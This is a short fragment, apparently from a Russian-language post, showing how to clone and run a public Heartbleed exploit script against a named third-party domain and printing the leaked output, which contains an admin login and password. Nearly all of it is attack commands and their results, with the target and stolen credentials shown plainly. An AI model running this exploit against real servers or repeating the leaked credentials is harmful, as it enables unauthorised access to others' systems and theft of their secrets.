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https://github.com/wallarm/heartbleed.py.git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heartbleed.py/ &amp;&amp; chmod 777 heartbleed.py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./heartbleed.py -v saymeis.ru -n 100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Выхлоп : login=admin&amp;password=megansapass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1219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wallarm/heartbleed.py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